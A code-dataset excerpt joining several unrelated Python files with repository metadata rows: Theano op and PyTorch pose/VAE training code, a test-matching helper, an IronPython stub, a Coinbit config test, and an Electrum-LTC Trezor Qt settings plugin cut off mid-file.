# if the Op has any attributes, consider using them in the eq function.
# If two Apply nodes have the same inputs and the ops compare equal...
# then they will be MERGED so they had better have computed the same thing!
__props__ = ()
def __init__(self):
# If you put things here, think about whether they change the outputs
# computed by # self.perform()
# - If they do, then you should take them into consideration in
# __eq__ and __hash__
# - If they do not, then you should not use them in
# __eq__ and __hash__
super().__init__()
def make_node(self, *args):
# HERE `args` must be THEANO VARIABLES
return Apply(op=self, inputs=args, outputs=[tensor.lscalar()])
def perform(self, node, inputs, out_):
(output,) = out_
# HERE `inputs` are PYTHON OBJECTS
# do what you want here,
# but do not modify any of the arguments [inplace].
print("perform got %i arguments" % len(inputs))
print("Max of input[0] is ", np.max(inputs[0]))
# return some computed value.
# do not return something that is aliased to one of the inputs.
output[0] = np.asarray(0, dtype="int64")
minimal = Minimal()
| 30.744681 | 79 | 0.636678 |
4a2277040c23e3f0a6c45560a469e691667eb95f | 5,284 | py | Python | task/pose.py | crockwell/pytorch_stacked-hourglass-cutout | 35c97d1e3515e9c2fad78c4c666c4a9cc4a77055 | [
"BSD-3-Clause"
] | 4 | 2020-01-01T12:27:59.000Z | 2022-03-04T15:59:36.000Z | task/pose.py | crockwell/pytorch_stacked-hourglass-cutout | 35c97d1e3515e9c2fad78c4c666c4a9cc4a77055 | [
"BSD-3-Clause"
] | null | null | null | task/pose.py | crockwell/pytorch_stacked-hourglass-cutout | 35c97d1e3515e9c2fad78c4c666c4a9cc4a77055 | [
"BSD-3-Clause"
] | null | null | null | """
__config__ contains the options for training and testing
Basically all of the variables related to training are put in __config__['train']
"""
import torch
import numpy as np
from torch import nn
import os
from torch.nn import DataParallel
from utils.misc import make_input, make_output, importNet
__config__ = {
'data_provider': 'data.MPII.dp',
'network': 'models.posenet.PoseNet',
'inference': {
'nstack': 2,
'inp_dim': 256,
'oup_dim': 16,
'num_parts': 16,
'increase': 0,
'keys': ['imgs'],
'num_eval': 2958, ## number of val examples used. entire set is 2958
'train_num_eval': 300, ## number of train examples tested at test time
},
'train': {
'batchsize': 16,
'input_res': 256,
'output_res': 64,
'train_iters': 1000,
'valid_iters': 10,
'learning_rate': 1e-3,
'max_num_people' : 1,
'loss': [
['combined_hm_loss', 1],
],
'decay_iters': 100000,
'decay_lr': 2e-4,
'num_workers': 2,
'use_data_loader': True,
'mean': [.3643, .3437, .3156],
'stdev': [.1510, .1469, .1472],
'cutout_size': 64,
'cutout_prob': 1,
'num_holes': 2,
},
}
class Trainer(nn.Module):
"""
The wrapper module that will behave differetly for training or testing
inference_keys specify the inputs for inference
"""
def __init__(self, model, inference_keys, calc_loss=None):
super(Trainer, self).__init__()
self.model = model
self.keys = inference_keys
self.calc_loss = calc_loss
def forward(self, imgs, **inputs):
inps = {}
labels = {}
for i in inputs:
if i in self.keys:
inps[i] = inputs[i]
else:
labels[i] = inputs[i]
if not self.training:
return self.model(imgs, **inps)
else:
combined_hm_preds = self.model(imgs, **inps)
if type(combined_hm_preds)!=list and type(combined_hm_preds)!=tuple:
combined_hm_preds = [combined_hm_preds]
loss = self.calc_loss(**labels, combined_hm_preds=combined_hm_preds)
return list(combined_hm_preds) + list([loss])
def make_network(configs):
train_cfg = configs['train']
config = configs['inference']
def calc_loss(*args, **kwargs):
return poseNet.calc_loss(*args, **kwargs)
## creating new posenet
PoseNet = importNet(configs['network'])
poseNet = PoseNet(**config)
forward_net = DataParallel(poseNet.cuda())
config['net'] = Trainer(forward_net, configs['inference']['keys'], calc_loss)
## optimizer, experiment setup
train_cfg['optimizer'] = torch.optim.Adam(filter(lambda p: p.requires_grad,config['net'].parameters()), train_cfg['learning_rate'])
exp_path = os.path.join('exp', configs['opt'].exp)
if configs['opt'].exp=='pose' and configs['opt'].continue_exp is not None:
exp_path = os.path.join('exp', configs['opt'].continue_exp)
if not os.path.exists(exp_path):
os.mkdir(exp_path)
logger = open(os.path.join(exp_path, 'log'), 'a+')
def make_train(batch_id, config, phase, **inputs):
for i in inputs:
try:
inputs[i] = make_input(inputs[i])
except:
pass #for last input, which is a string (id_)
net = config['inference']['net']
config['batch_id'] = batch_id
net = net.train()
if phase != 'inference':
result = net(inputs['imgs'], **{i:inputs[i] for i in inputs if i!='imgs'})
num_loss = len(config['train']['loss'])
losses = {i[0]: result[-num_loss + idx]*i[1] for idx, i in enumerate(config['train']['loss'])}
loss = 0
toprint = '\n{}: '.format(batch_id)
for i in losses:
loss = loss + torch.mean(losses[i])
my_loss = make_output( losses[i] )
my_loss = my_loss.mean()
if my_loss.size == 1:
toprint += ' {}: {}'.format(i, format(my_loss.mean(), '.8f'))
else:
toprint += '\n{}'.format(i)
for j in my_loss:
toprint += ' {}'.format(format(j.mean(), '.8f'))
logger.write(toprint)
logger.flush()
if phase == 'train':
optimizer = train_cfg['optimizer']
optimizer.zero_grad()
loss.backward()
optimizer.step()
if batch_id == config['train']['decay_iters']:
## decrease the learning rate after decay # iterations
for param_group in optimizer.param_groups:
param_group['lr'] = config['train']['decay_lr']
return None
else:
out = {}
net = net.eval()
result = net(**inputs)
if type(result)!=list and type(result)!=tuple:
result = [result]
out['preds'] = [make_output(i) for i in result]
return out
return make_train
| 33.443038 | 135 | 0.539364 |
4a22776ae7502680bb7d4e9c9dfbe014a66ed10b | 2,382 | py | Python | vae/vae_train.py | Brikwerk/vocals-generation | 36fff07698aa8d8de12d4478968081347a444cb6 | [
"MIT"
] | null | null | null | vae/vae_train.py | Brikwerk/vocals-generation | 36fff07698aa8d8de12d4478968081347a444cb6 | [
"MIT"
] | null | null | null | vae/vae_train.py | Brikwerk/vocals-generation | 36fff07698aa8d8de12d4478968081347a444cb6 | [
"MIT"
] | null | null | null | from asyncio.log import logger
import random
from src.dataset import StemsDataset
from src.vae_models import LitVAE
import torch
import torch.nn as nn
from torch.utils.data import DataLoader, random_split
import pytorch_lightning as pl
from pytorch_lightning import loggers as pl_loggers
from pl_bolts.models.autoencoders.components import (
resnet18_decoder,
resnet18_encoder,
resnet50_decoder,
resnet50_encoder,
)
import numpy as np
if __name__ == "__main__":
# Config
input_size = (1, 216, 216)
# encoder_output_dim = 512 # Resnet18
encoder_output_dim = 2048 # Resnet50
latent_dim = 1024
batch_size = 6
gpus = 1
epochs = 550
# Ensure reproducibility
torch.manual_seed(42)
random.seed(42)
np.random.seed(42)
# Create an amend encoder and decoder
# for processing spectrograms.
encoder = resnet50_encoder(False, False)
encoder.conv1 = nn.Conv2d(input_size[0], 64,
kernel_size=(3, 3),
stride=(1, 1),
padding=(1, 1),
bias=False
)
decoder = resnet50_decoder(
latent_dim=latent_dim,
input_height = input_size[1],
first_conv=False,
maxpool1=False
)
# decoder.conv1 = nn.Conv2d(64, input_size[0], # ResNet18
decoder.conv1 = nn.Conv2d(256, input_size[0], # ResNet50
kernel_size=(3, 3),
stride=(1, 1),
padding=(1, 1),
bias=False
)
# Load the dataset
dataset = StemsDataset(
data_root='FOLDER_PATH_TO_DATA_GOES_HERE',
)
# Split into train and test sets
train_size = int(0.8 * len(dataset))
test_size = len(dataset) - train_size
train_dataset, test_dataset = random_split(dataset, [train_size, test_size])
# Create data loaders
train_loader = DataLoader(
train_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=16,
)
test_loader = DataLoader(
test_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=16,
)
vae = LitVAE(encoder, decoder,
enc_output_dim=encoder_output_dim,
latent_dim=latent_dim,
input_size=input_size)
tb_logger = pl_loggers.TensorBoardLogger("./logs/", "VAE")
trainer = pl.Trainer(
gpus=gpus,
max_epochs=epochs,
logger=tb_logger)
trainer.fit(vae, train_loader)
| 25.340426 | 80 | 0.652813 |
4a22782ebf57053095ec5f6c86c144e6d695062d | 2,155 | py | Python | should_test/collections.py | kzawisto/should_test | fb0bff80ba9de44654c53b4b8164d90036359b77 | [
"MIT"
] | null | null | null | should_test/collections.py | kzawisto/should_test | fb0bff80ba9de44654c53b4b8164d90036359b77 | [
"MIT"
] | null | null | null | should_test/collections.py | kzawisto/should_test | fb0bff80ba9de44654c53b4b8164d90036359b77 | [
"MIT"
] | null | null | null | from .core import Matching
class ADict(Matching):
def __init__(self, value):
super(ADict, self).__init__()
self.value = value
@property
def should(self):
val = ADict(self.value)
val.trace = self.trace
return val
class ADictShould(Matching):
def __init__(self, value):
super(ADictShould, self).__init__()
self.value = value
def _this_and_other(self, other):
return "actual {} and expected {}".format(self.value, other)
def verify_same_keys(self, other):
keyset_actual = set(self.value.keys())
keyset_other = set(other.keys())
diff1= keyset_actual.difference(keyset_other)
diff2= keyset_other.difference(keyset_actual)
if len(diff1) != 0:
message = self._this_and_other(other) + " have different keys:" + \
"{} are present in actual but not in expected".format(diff1)
return self.get_match_result(
False,
message,
"" # negated failure never happens
)
if len(diff2) != 0:
message = self._this_and_other(other) + " have different keys:" + \
"{} are present in expected but not in actual".format(diff2)
return self.get_match_result(
False,
message,
"" # negated failure never happens
)
return None
def verify_same_values(self, other):
different_keys = [i for i in self.value.keys() if self.value.keys() != other]
message = self._this_and_other(other) + " are not equal:\n " +\
"\n".join([
"at key {k}: {v1} is not equal to {v2}"
.format(k=k, v1=self.value[k], v2=other[k])
for k in different_keys
])
return self.get_match_result(
len(different_keys) == 0,
message,
self._this_and_other(other) + " are equal."
)
def be_equal_to(self, other):
are_keys_not_same = self.verify_same_keys(other)
if are_keys_not_same:
return are_keys_not_same
| 32.164179 | 85 | 0.563805 |
4a2279d946415c55c4b7a4775061a916b5591f4f | 1,588 | py | Python | release/stubs.min/System/Windows/Forms/__init___parts/SplitterCancelEventArgs.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/System/Windows/Forms/__init___parts/SplitterCancelEventArgs.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/System/Windows/Forms/__init___parts/SplitterCancelEventArgs.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | class SplitterCancelEventArgs(CancelEventArgs):
"""
Provides data for splitter events.
SplitterCancelEventArgs(mouseCursorX: int,mouseCursorY: int,splitX: int,splitY: int)
"""
@staticmethod
def __new__(self, mouseCursorX, mouseCursorY, splitX, splitY):
""" __new__(cls: type,mouseCursorX: int,mouseCursorY: int,splitX: int,splitY: int) """
pass
MouseCursorX = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Gets the X coordinate of the mouse pointer in client coordinates.
Get: MouseCursorX(self: SplitterCancelEventArgs) -> int
"""
MouseCursorY = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Gets the Y coordinate of the mouse pointer in client coordinates.
Get: MouseCursorY(self: SplitterCancelEventArgs) -> int
"""
SplitX = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets the X coordinate of the upper left corner of the System.Windows.Forms.SplitContainer in client coordinates.
Get: SplitX(self: SplitterCancelEventArgs) -> int
Set: SplitX(self: SplitterCancelEventArgs)=value
"""
SplitY = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets the Y coordinate of the upper left corner of the System.Windows.Forms.SplitContainer in client coordinates.
Get: SplitY(self: SplitterCancelEventArgs) -> int
Set: SplitY(self: SplitterCancelEventArgs)=value
"""
| 24.060606 | 128 | 0.678212 |
4a227b3b4f8a1ac0d68e241322b2f367068550bf | 2,327 | py | Python | test/functional/feature_config_args.py | CoinBitCore/temp | a2ebefc861aa979b441286a203d574197459b0d6 | [
"MIT"
] | null | null | null | test/functional/feature_config_args.py | CoinBitCore/temp | a2ebefc861aa979b441286a203d574197459b0d6 | [
"MIT"
] | null | null | null | test/functional/feature_config_args.py | CoinBitCore/temp | a2ebefc861aa979b441286a203d574197459b0d6 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2017 The Coinbit Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test various command line arguments and configuration file parameters."""
import os
from test_framework.test_framework import CoinbitTestFramework
from test_framework.util import get_datadir_path
class ConfArgsTest(CoinbitTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
self.stop_node(0)
# Remove the -datadir argument so it doesn't override the config file
self.nodes[0].args = [arg for arg in self.nodes[0].args if not arg.startswith("-datadir")]
default_data_dir = get_datadir_path(self.options.tmpdir, 0)
new_data_dir = os.path.join(default_data_dir, 'newdatadir')
new_data_dir_2 = os.path.join(default_data_dir, 'newdatadir2')
# Check that using -datadir argument on non-existent directory fails
self.nodes[0].datadir = new_data_dir
self.assert_start_raises_init_error(0, ['-datadir='+new_data_dir], 'Error: Specified data directory "' + new_data_dir + '" does not exist.')
# Check that using non-existent datadir in conf file fails
conf_file = os.path.join(default_data_dir, "coinbit.conf")
with open(conf_file, 'a', encoding='utf8') as f:
f.write("datadir=" + new_data_dir + "\n")
self.assert_start_raises_init_error(0, ['-conf='+conf_file], 'Error reading configuration file: specified data directory "' + new_data_dir + '" does not exist.')
# Create the directory and ensure the config file now works
os.mkdir(new_data_dir)
self.start_node(0, ['-conf='+conf_file, '-wallet=w1'])
self.stop_node(0)
assert os.path.isfile(os.path.join(new_data_dir, 'regtest', 'wallets', 'w1'))
# Ensure command line argument overrides datadir in conf
os.mkdir(new_data_dir_2)
self.nodes[0].datadir = new_data_dir_2
self.start_node(0, ['-datadir='+new_data_dir_2, '-conf='+conf_file, '-wallet=w2'])
assert os.path.isfile(os.path.join(new_data_dir_2, 'regtest', 'wallets', 'w2'))
if __name__ == '__main__':
ConfArgsTest().main()
| 46.54 | 169 | 0.694027 |
4a227bf75eb031a5b8e9bdde6107eea80a26c4ad | 24,617 | py | Python | plugins/trezor/qt_generic.py | namuyan/electrum-fjc | 1a5c4a582f0fcdbaeca2b721ee729f43cd7915a2 | [
"MIT"
] | 1 | 2017-07-06T03:03:25.000Z | 2017-07-06T03:03:25.000Z | plugins/trezor/qt_generic.py | namuyan/electrum-fjc | 1a5c4a582f0fcdbaeca2b721ee729f43cd7915a2 | [
"MIT"
] | null | null | null | plugins/trezor/qt_generic.py | namuyan/electrum-fjc | 1a5c4a582f0fcdbaeca2b721ee729f43cd7915a2 | [
"MIT"
] | null | null | null | from functools import partial
import threading
from PyQt4.Qt import Qt
from PyQt4.Qt import QGridLayout, QInputDialog, QPushButton
from PyQt4.Qt import QVBoxLayout, QLabel, SIGNAL
from electrum_ltc_gui.qt.util import *
from .plugin import TIM_NEW, TIM_RECOVER, TIM_MNEMONIC
from ..hw_wallet.qt import QtHandlerBase, QtPluginBase
from electrum_ltc.i18n import _
from electrum_ltc.plugins import hook, DeviceMgr
from electrum_ltc.util import PrintError, UserCancelled
from electrum_ltc.wallet import Wallet, Standard_Wallet
PASSPHRASE_HELP_SHORT =_(
"Passphrases allow you to access new wallets, each "
"hidden behind a particular case-sensitive passphrase.")
PASSPHRASE_HELP = PASSPHRASE_HELP_SHORT + " " + _(
"You need to create a separate Electrum wallet for each passphrase "
"you use as they each generate different addresses. Changing "
"your passphrase does not lose other wallets, each is still "
"accessible behind its own passphrase.")
RECOMMEND_PIN = _(
"You should enable PIN protection. Your PIN is the only protection "
"for your litecoins if your device is lost or stolen.")
PASSPHRASE_NOT_PIN = _(
"If you forget a passphrase you will be unable to access any "
"litecoins in the wallet behind it. A passphrase is not a PIN. "
"Only change this if you are sure you understand it.")
CHARACTER_RECOVERY = (
"Use the recovery cipher shown on your device to input your seed words. "
"The cipher changes with every keypress.\n"
"After at most 4 letters the device will auto-complete a word.\n"
"Press SPACE or the Accept Word button to accept the device's auto-"
"completed word and advance to the next one.\n"
"Press BACKSPACE to go back a character or word.\n"
"Press ENTER or the Seed Entered button once the last word in your "
"seed is auto-completed.")
class CharacterButton(QPushButton):
def __init__(self, text=None):
QPushButton.__init__(self, text)
def keyPressEvent(self, event):
event.setAccepted(False) # Pass through Enter and Space keys
class CharacterDialog(WindowModalDialog):
def __init__(self, parent):
super(CharacterDialog, self).__init__(parent)
self.setWindowTitle(_("KeepKey Seed Recovery"))
self.character_pos = 0
self.word_pos = 0
self.loop = QEventLoop()
self.word_help = QLabel()
self.char_buttons = []
vbox = QVBoxLayout(self)
vbox.addWidget(WWLabel(CHARACTER_RECOVERY))
hbox = QHBoxLayout()
hbox.addWidget(self.word_help)
for i in range(4):
char_button = CharacterButton('*')
char_button.setMaximumWidth(36)
self.char_buttons.append(char_button)
hbox.addWidget(char_button)
self.accept_button = CharacterButton(_("Accept Word"))
self.accept_button.clicked.connect(partial(self.process_key, 32))
self.rejected.connect(partial(self.loop.exit, 1))
hbox.addWidget(self.accept_button)
hbox.addStretch(1)
vbox.addLayout(hbox)
self.finished_button = QPushButton(_("Seed Entered"))
self.cancel_button = QPushButton(_("Cancel"))
self.finished_button.clicked.connect(partial(self.process_key,
Qt.Key_Return))
self.cancel_button.clicked.connect(self.rejected)
buttons = Buttons(self.finished_button, self.cancel_button)
vbox.addSpacing(40)
vbox.addLayout(buttons)
self.refresh()
self.show()
def refresh(self):
self.word_help.setText("Enter seed word %2d:" % (self.word_pos + 1))
self.accept_button.setEnabled(self.character_pos >= 3)
self.finished_button.setEnabled((self.word_pos in (11, 17, 23)
and self.character_pos >= 3))
for n, button in enumerate(self.char_buttons):
button.setEnabled(n == self.character_pos)
if n == self.character_pos:
button.setFocus()
def is_valid_alpha_space(self, key):
# Auto-completion requires at least 3 characters
if key == ord(' ') and self.character_pos >= 3:
return True
# Firmware aborts protocol if the 5th character is non-space
if self.character_pos >= 4:
return False
return (key >= ord('a') and key <= ord('z')
or (key >= ord('A') and key <= ord('Z')))
def process_key(self, key):
self.data = None
if key == Qt.Key_Return and self.finished_button.isEnabled():
self.data = {'done': True}
elif key == Qt.Key_Backspace and (self.word_pos or self.character_pos):
self.data = {'delete': True}
elif self.is_valid_alpha_space(key):
self.data = {'character': chr(key).lower()}
if self.data:
self.loop.exit(0)
def keyPressEvent(self, event):
self.process_key(event.key())
if not self.data:
QDialog.keyPressEvent(self, event)
def get_char(self, word_pos, character_pos):
self.word_pos = word_pos
self.character_pos = character_pos
self.refresh()
if self.loop.exec_():
self.data = None # User cancelled
class QtHandler(QtHandlerBase):
char_signal = pyqtSignal(object)
pin_signal = pyqtSignal(object)
def __init__(self, win, pin_matrix_widget_class, device):
super(QtHandler, self).__init__(win, device)
self.char_signal.connect(self.update_character_dialog)
self.pin_signal.connect(self.pin_dialog)
self.pin_matrix_widget_class = pin_matrix_widget_class
self.character_dialog = None
def get_char(self, msg):
self.done.clear()
self.char_signal.emit(msg)
self.done.wait()
data = self.character_dialog.data
if not data or 'done' in data:
self.character_dialog.accept()
self.character_dialog = None
return data
def get_pin(self, msg):
self.done.clear()
self.pin_signal.emit(msg)
self.done.wait()
return self.response
def pin_dialog(self, msg):
# Needed e.g. when resetting a device
self.clear_dialog()
dialog = WindowModalDialog(self.top_level_window(), _("Enter PIN"))
matrix = self.pin_matrix_widget_class()
vbox = QVBoxLayout()
vbox.addWidget(QLabel(msg))
vbox.addWidget(matrix)
vbox.addLayout(Buttons(CancelButton(dialog), OkButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
self.response = str(matrix.get_value())
self.done.set()
def update_character_dialog(self, msg):
if not self.character_dialog:
self.character_dialog = CharacterDialog(self.top_level_window())
self.character_dialog.get_char(msg.word_pos, msg.character_pos)
self.done.set()
class QtPlugin(QtPluginBase):
# Derived classes must provide the following class-static variables:
# icon_file
# pin_matrix_widget_class
def create_handler(self, window):
return QtHandler(window, self.pin_matrix_widget_class(), self.device)
@hook
def receive_menu(self, menu, addrs, wallet):
if type(wallet) is not Standard_Wallet:
return
keystore = wallet.get_keystore()
if type(keystore) == self.keystore_class and len(addrs) == 1:
def show_address():
keystore.thread.add(partial(self.show_address, wallet, addrs[0]))
menu.addAction(_("Show on %s") % self.device, show_address)
def show_settings_dialog(self, window, keystore):
device_id = self.choose_device(window, keystore)
if device_id:
SettingsDialog(window, self, keystore, device_id).exec_()
def request_trezor_init_settings(self, wizard, method, device):
vbox = QVBoxLayout()
next_enabled = True
label = QLabel(_("Enter a label to name your device:"))
name = QLineEdit()
hl = QHBoxLayout()
hl.addWidget(label)
hl.addWidget(name)
hl.addStretch(1)
vbox.addLayout(hl)
def clean_text(widget):
text = unicode(widget.toPlainText()).strip()
return ' '.join(text.split())
if method in [TIM_NEW, TIM_RECOVER]:
gb = QGroupBox()
hbox1 = QHBoxLayout()
gb.setLayout(hbox1)
# KeepKey recovery doesn't need a word count
if method == TIM_NEW or self.device == 'TREZOR':
vbox.addWidget(gb)
gb.setTitle(_("Select your seed length:"))
bg = QButtonGroup()
for i, count in enumerate([12, 18, 24]):
rb = QRadioButton(gb)
rb.setText(_("%d words") % count)
bg.addButton(rb)
bg.setId(rb, i)
hbox1.addWidget(rb)
rb.setChecked(True)
cb_pin = QCheckBox(_('Enable PIN protection'))
cb_pin.setChecked(True)
else:
text = QTextEdit()
text.setMaximumHeight(60)
if method == TIM_MNEMONIC:
msg = _("Enter your BIP39 mnemonic:")
else:
msg = _("Enter the master private key beginning with xprv:")
def set_enabled():
from electrum_ltc.keystore import is_xprv
wizard.next_button.setEnabled(is_xprv(clean_text(text)))
text.textChanged.connect(set_enabled)
next_enabled = False
vbox.addWidget(QLabel(msg))
vbox.addWidget(text)
pin = QLineEdit()
pin.setValidator(QRegExpValidator(QRegExp('[1-9]{0,10}')))
pin.setMaximumWidth(100)
hbox_pin = QHBoxLayout()
hbox_pin.addWidget(QLabel(_("Enter your PIN (digits 1-9):")))
hbox_pin.addWidget(pin)
hbox_pin.addStretch(1)
if method in [TIM_NEW, TIM_RECOVER]:
vbox.addWidget(WWLabel(RECOMMEND_PIN))
vbox.addWidget(cb_pin)
else:
vbox.addLayout(hbox_pin)
passphrase_msg = WWLabel(PASSPHRASE_HELP_SHORT)
passphrase_warning = WWLabel(PASSPHRASE_NOT_PIN)
passphrase_warning.setStyleSheet("color: red")
cb_phrase = QCheckBox(_('Enable passphrases'))
cb_phrase.setChecked(False)
vbox.addWidget(passphrase_msg)
vbox.addWidget(passphrase_warning)
vbox.addWidget(cb_phrase)
wizard.exec_layout(vbox, next_enabled=next_enabled)
if method in [TIM_NEW, TIM_RECOVER]:
item = bg.checkedId()
pin = cb_pin.isChecked()
else:
item = ' '.join(str(clean_text(text)).split())
pin = str(pin.text())
return (item, unicode(name.text()), pin, cb_phrase.isChecked())
class SettingsDialog(WindowModalDialog):
'''This dialog doesn't require a device be paired with a wallet.
We want users to be able to wipe a device even if they've forgotten
their PIN.'''
def __init__(self, window, plugin, keystore, device_id):
title = _("%s Settings") % plugin.device
super(SettingsDialog, self).__init__(window, title)
self.setMaximumWidth(540)
devmgr = plugin.device_manager()
config = devmgr.config
handler = keystore.handler
thread = keystore.thread
hs_rows, hs_cols = (64, 128)
def invoke_client(method, *args, **kw_args):
unpair_after = kw_args.pop('unpair_after', False)
def task():
client = devmgr.client_by_id(device_id)
if not client:
raise RuntimeError("Device not connected")
if method:
getattr(client, method)(*args, **kw_args)
if unpair_after:
devmgr.unpair_id(device_id)
return client.features
thread.add(task, on_success=update)
def update(features):
self.features = features
set_label_enabled()
bl_hash = features.bootloader_hash.encode('hex')
bl_hash = "\n".join([bl_hash[:32], bl_hash[32:]])
noyes = [_("No"), _("Yes")]
endis = [_("Enable Passphrases"), _("Disable Passphrases")]
disen = [_("Disabled"), _("Enabled")]
setchange = [_("Set a PIN"), _("Change PIN")]
version = "%d.%d.%d" % (features.major_version,
features.minor_version,
features.patch_version)
coins = ", ".join(coin.coin_name for coin in features.coins)
device_label.setText(features.label)
pin_set_label.setText(noyes[features.pin_protection])
passphrases_label.setText(disen[features.passphrase_protection])
bl_hash_label.setText(bl_hash)
label_edit.setText(features.label)
device_id_label.setText(features.device_id)
initialized_label.setText(noyes[features.initialized])
version_label.setText(version)
coins_label.setText(coins)
clear_pin_button.setVisible(features.pin_protection)
clear_pin_warning.setVisible(features.pin_protection)
pin_button.setText(setchange[features.pin_protection])
pin_msg.setVisible(not features.pin_protection)
passphrase_button.setText(endis[features.passphrase_protection])
language_label.setText(features.language)
def set_label_enabled():
label_apply.setEnabled(label_edit.text() != self.features.label)
def rename():
invoke_client('change_label', unicode(label_edit.text()))
def toggle_passphrase():
title = _("Confirm Toggle Passphrase Protection")
currently_enabled = self.features.passphrase_protection
if currently_enabled:
msg = _("After disabling passphrases, you can only pair this "
"Electrum wallet if it had an empty passphrase. "
"If its passphrase was not empty, you will need to "
"create a new wallet with the install wizard. You "
"can use this wallet again at any time by re-enabling "
"passphrases and entering its passphrase.")
else:
msg = _("Your current Electrum wallet can only be used with "
"an empty passphrase. You must create a separate "
"wallet with the install wizard for other passphrases "
"as each one generates a new set of addresses.")
msg += "\n\n" + _("Are you sure you want to proceed?")
if not self.question(msg, title=title):
return
invoke_client('toggle_passphrase', unpair_after=currently_enabled)
def change_homescreen():
from PIL import Image # FIXME
dialog = QFileDialog(self, _("Choose Homescreen"))
filename = dialog.getOpenFileName()
if filename:
im = Image.open(str(filename))
if im.size != (hs_cols, hs_rows):
raise Exception('Image must be 64 x 128 pixels')
im = im.convert('1')
pix = im.load()
img = ''
for j in range(hs_rows):
for i in range(hs_cols):
img += '1' if pix[i, j] else '0'
img = ''.join(chr(int(img[i:i + 8], 2))
for i in range(0, len(img), 8))
invoke_client('change_homescreen', img)
def clear_homescreen():
invoke_client('change_homescreen', '\x00')
def set_pin():
invoke_client('set_pin', remove=False)
def clear_pin():
invoke_client('set_pin', remove=True)
def wipe_device():
wallet = window.wallet
if wallet and sum(wallet.get_balance()):
title = _("Confirm Device Wipe")
msg = _("Are you SURE you want to wipe the device?\n"
"Your wallet still has litecoins in it!")
if not self.question(msg, title=title,
icon=QMessageBox.Critical):
return
invoke_client('wipe_device', unpair_after=True)
def slider_moved():
mins = timeout_slider.sliderPosition()
timeout_minutes.setText(_("%2d minutes") % mins)
def slider_released():
config.set_session_timeout(timeout_slider.sliderPosition() * 60)
# Information tab
info_tab = QWidget()
info_layout = QVBoxLayout(info_tab)
info_glayout = QGridLayout()
info_glayout.setColumnStretch(2, 1)
device_label = QLabel()
pin_set_label = QLabel()
passphrases_label = QLabel()
version_label = QLabel()
device_id_label = QLabel()
bl_hash_label = QLabel()
bl_hash_label.setWordWrap(True)
coins_label = QLabel()
coins_label.setWordWrap(True)
language_label = QLabel()
initialized_label = QLabel()
rows = [
(_("Device Label"), device_label),
(_("PIN set"), pin_set_label),
(_("Passphrases"), passphrases_label),
(_("Firmware Version"), version_label),
(_("Device ID"), device_id_label),
(_("Bootloader Hash"), bl_hash_label),
(_("Supported Coins"), coins_label),
(_("Language"), language_label),
(_("Initialized"), initialized_label),
]
for row_num, (label, widget) in enumerate(rows):
info_glayout.addWidget(QLabel(label), row_num, 0)
info_glayout.addWidget(widget, row_num, 1)
info_layout.addLayout(info_glayout)
# Settings tab
settings_tab = QWidget()
settings_layout = QVBoxLayout(settings_tab)
settings_glayout = QGridLayout()
# Settings tab - Label
label_msg = QLabel(_("Name this %s. If you have mutiple devices "
"their labels help distinguish them.")
% plugin.device)
label_msg.setWordWrap(True)
label_label = QLabel(_("Device Label"))
label_edit = QLineEdit()
label_edit.setMinimumWidth(150)
label_edit.setMaxLength(plugin.MAX_LABEL_LEN)
label_apply = QPushButton(_("Apply"))
label_apply.clicked.connect(rename)
label_edit.textChanged.connect(set_label_enabled)
settings_glayout.addWidget(label_label, 0, 0)
settings_glayout.addWidget(label_edit, 0, 1, 1, 2)
settings_glayout.addWidget(label_apply, 0, 3)
settings_glayout.addWidget(label_msg, 1, 1, 1, -1)
# Settings tab - PIN
pin_label = QLabel(_("PIN Protection"))
pin_button = QPushButton()
pin_button.clicked.connect(set_pin)
settings_glayout.addWidget(pin_label, 2, 0)
settings_glayout.addWidget(pin_button, 2, 1)
pin_msg = QLabel(_("PIN protection is strongly recommended. "
"A PIN is your only protection against someone "
"stealing your litecoins if they obtain physical "
"access to your %s.") % plugin.device)
pin_msg.setWordWrap(True)
pin_msg.setStyleSheet("color: red")
settings_glayout.addWidget(pin_msg, 3, 1, 1, -1)
# Settings tab - Homescreen
if plugin.device != 'KeepKey': # Not yet supported by KK firmware
homescreen_layout = QHBoxLayout()
homescreen_label = QLabel(_("Homescreen"))
homescreen_change_button = QPushButton(_("Change..."))
homescreen_clear_button = QPushButton(_("Reset"))
homescreen_change_button.clicked.connect(change_homescreen)
homescreen_clear_button.clicked.connect(clear_homescreen)
homescreen_msg = QLabel(_("You can set the homescreen on your "
"device to personalize it. You must "
"choose a %d x %d monochrome black and "
"white image.") % (hs_rows, hs_cols))
homescreen_msg.setWordWrap(True)
settings_glayout.addWidget(homescreen_label, 4, 0)
settings_glayout.addWidget(homescreen_change_button, 4, 1)
settings_glayout.addWidget(homescreen_clear_button, 4, 2)
settings_glayout.addWidget(homescreen_msg, 5, 1, 1, -1)
# Settings tab - Session Timeout
timeout_label = QLabel(_("Session Timeout"))
timeout_minutes = QLabel()
timeout_slider = QSlider(Qt.Horizontal)
timeout_slider.setRange(1, 60)
timeout_slider.setSingleStep(1)
timeout_slider.setTickInterval(5)
timeout_slider.setTickPosition(QSlider.TicksBelow)
timeout_slider.setTracking(True)
timeout_msg = QLabel(
_("Clear the session after the specified period "
"of inactivity. Once a session has timed out, "
"your PIN and passphrase (if enabled) must be "
"re-entered to use the device."))
timeout_msg.setWordWrap(True)
timeout_slider.setSliderPosition(config.get_session_timeout() // 60)
slider_moved()
timeout_slider.valueChanged.connect(slider_moved)
timeout_slider.sliderReleased.connect(slider_released)
settings_glayout.addWidget(timeout_label, 6, 0)
settings_glayout.addWidget(timeout_slider, 6, 1, 1, 3)
